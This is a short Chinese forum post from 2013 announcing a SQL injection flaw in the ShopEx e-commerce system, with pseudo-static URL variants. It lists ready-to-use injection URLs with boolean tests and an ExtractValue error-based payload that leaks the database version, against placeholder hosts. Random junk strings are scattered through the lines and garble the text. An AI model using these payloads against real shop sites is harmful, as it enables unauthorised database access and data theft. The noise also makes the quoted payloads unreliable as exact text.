注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…" \" `' j% w; y# G
0 A9 s0 S9 W2 u好吧,我扯远了~~
( }3 E4 W$ ~" ~( U# U: o( o其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
9 q1 F6 I7 X4 E( J, v4 w' R! q! W& W不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
2 e* i% h. L6 W/ q0 C# Y
' O. G' d4 h! h; r0 hhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 b, R' L5 n/ p' x$ O8 _ X
6 n' R) c ~0 f) v* z! w1 Nhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html9 P) f9 G9 _3 T# o( @ [* l g% Z
6 E/ u: Q4 I& O' y2 [http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
& b4 F( r# f+ H6 ^6 C5 w: u' s% j! N! B# p6 w! l
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html1 T) r3 T# ]$ c) Q! `
& V9 j g: i' [- j5 { |
0 f5 s1 w* u! s; t, ?0 w) B: o一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。2 I8 L B7 ~ Q8 b( V) y: k, C; x; u
如何注入就不多说了,10多年的东西了…不会也会了…
) {0 j+ B9 a. C9 X, [5 P' k* ?( u2 e; o% T3 K$ B0 m$ p
|
发表于 2013-2-4 16:20:04
收藏
支持
反对